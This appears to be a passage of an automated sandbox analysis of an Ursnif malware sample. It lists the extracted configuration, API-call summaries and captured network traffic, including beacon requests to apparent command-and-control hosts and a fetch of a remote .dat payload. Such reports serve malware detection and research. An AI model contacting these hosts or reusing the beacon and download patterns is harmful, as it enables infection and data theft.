Source: regsvr32.exe.5032.1.memstr |
Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "363", "system": "d18bca24401b3a0555b04f62f946271ehh~", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1613090881", "user": "902d52678695dc15e71ab15cab4ca1f8", "hash": "0xcf6ed071", "soft": "3"} |
Source: 2200.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: unknown |
HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2 |
Source: |
Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp |
Source: |
Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp |
Source: |
Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll |
Source: |
Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp |
Source: |
Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp |
Source: |
Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll |
Source: |
Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp |
Source: |
Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp |
Source: |
Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, |
1_2_001F7DD8 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, |
1_2_00B1E0BA |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
1_2_00B2888D |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
1_2_00B34FE1 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 1_2_00B205EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, |
1_2_00B205EF |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: c56.lepini.at |
Source: Joe Sandbox View |
IP Address: 104.20.185.68 104.20.185.68 |
Source: Joe Sandbox View |
IP Address: 87.248.118.23 87.248.118.23 |
Source: Joe Sandbox View |
JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c |
Source: global traffic |
HTTP traffic detected: GET /api1/lgORGW5qFn_2FL/FlQCK9WAHI3Hiwfkv_2Bd/YD_2BI2Xw2AGWng8/expfsroDYWZ8_2B/ZGfgnzwsY_2FSQ_2F3/a2GGZduez/SqOtvGRODR9NxK4_2F3R/2gP8hWIKAYYweque45c/mmo1QCYZVFeP5qFtRQW3rp/ESP8Dg0JYvi4a/zzwdg1Ba/kVPhJOlEUkXV9nZ6TtxGPu4/gqcL2pxbRo/OD4R3VuLXH9TB9ksT/J7YsghyQco_2/BonnsCX3QSq/e_2FlgvYSOP02Q/dsGMQxaYUUX012u0t5_2F/50UM82sSS5a5iW39/tnrjay9bJzCbz3PtHnh/d HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/JQsoHKJSB/rNdVJ_2ByIK2QDFJR2qj/j2rw6DMd2f1e8eX8Ymg/9u0LouY1o0qnmocJ9nvfxr/XWjhEhDNEaQ_2/FYjjcA0h/eSTxi0np2M3GkDMJDUmRsAx/UvQhMAtYfw/bHvbHCpgIxEwn0SZp/LrrAt8U21M_2/BpEUbP2CORo/UW2pHsPHTDkzWu/mBoET9UfbltaF6qE6vcC1/04nY6eMBCYxT6Jao/ppmN_2FO5sKlIZe/z_2BFpIddjhGIg8u2_/2BrPbB1qq/eH44l_2FjBBiq9Kt9ByU/r3_2FcOIEGEvR4XQZpv/b5bozqpj7Ty6A4nci6CZa8/UAjk867qSAa/FjzX0u4 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: api10.laptok.at
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /api1/wPzY3TDew43rXgQ6h/jEuIuoewqqB_/2F8ty3dLaY0/g90J7yjpK4odzi/vJi7IcKUU7_2FxV8Z1qJI/_2Fs8Hy6ruNNXyd6/38pqG0u5LLQdPzP/ktNaKKuwlZigK_2Bvf/4YgNdy1LG/0Pu5bq_2FGp6HB5pNjiJ/RyL8GbL1FBB7I0W7eeW/LbvyRsvJlR2hT9EfEV7uAT/oI3vL_2BYGZE4/pytYFaia/wB_2BesnXvclSGag5xIl6QE/_2Fx_2FVgm/IkzdNmlB1x77eK_2F/ru0HED6qmv28/EwOp3VJsFvN/Oy6MX9770H20zV/NCGPJIvS0pQunXbVHlbjM/xQp8l5w_2BDk0RE85W/6 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: c56.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/DuDF5ppGssBEcEr/QV9fVntnhIoMQikVLO/d6hiSYeOV/4dYFGDJikRkXzxb_2BwW/QFQQ_2FlxfAt2qA9o9g/62AD_2B2fmm2iqEcG6vEpj/wjoFULqIWzBtE/kxblvPrR/0YVugCmN_2Bc2j9hBYYHAx9/MHnpC4iz_2/F5oIRFMeoEacrx2cV/NDVPaDtLYLzj/tmzoxSzXTF9/V0uTtxgzD_2FHy/qFYc0FBl_2Bwgx5A9auDk/zR8Z_2FGrqOtQfFe/ortBJ2feUbdJvQH/rb6hSVK_2BoVNgF7mN/65jgIEhh3/dPvzgP_2ByDfnONu1bga/xxZ9XKj_2/B3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Host: api3.lepini.at |
Source: global traffic |
HTTP traffic detected: GET /api1/4ZiHzRCntPm2_2Bs_/2FRsqW01GOmk/jlSxz1SigWt/9VO23wgzmt0z6v/oeSxd8UkQmb8DtzG6cPTd/ym_2By61IoxlQY3M/yETa3aFgtQZDw09/uFg9yjZYa11Lr07gXa/S4TdWO0jq/r61swA9KHU0n7D5WiS6M/aB0_2F0q98FaVumUgko/cxT6YBLiCeGe4HDHV0QwGa/JrNDDK39RFrqA/bnSciaqC/5xKVdu46G4ukxU_2BpjItQZ/vWdcVJKKZr/8uf5Z_2FSSRnkdJI6/EcvRjJAc0DIs/MbGP9aL3I1L/I1KoMe2FXtyIq_/2Fdget5Pj/NB HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Host: api3.lepini.at |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook) |
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp |
String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler) |
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp |
String found in binary or memory: :2021021220210213: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail) |
Source: msapplication.xml0.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml0.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa62b8c8d,0x01d700d8</date><accdate>0xa62b8c8d,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook) |
Source: msapplication.xml5.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml5.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter) |
Source: msapplication.xml7.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: msapplication.xml7.3.dr |
String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6305144,0x01d700d8</date><accdate>0xa6305144,0x01d700d8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube) |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail) |
Source: 85-0f8009-68ddb2ab[1].js.4.dr |
String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter) |
Source: de-ch[1].htm.4.dr |
String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+" Ref 2: "+e.html(t.clientSettings.sid||"000000")+" Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 
48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in |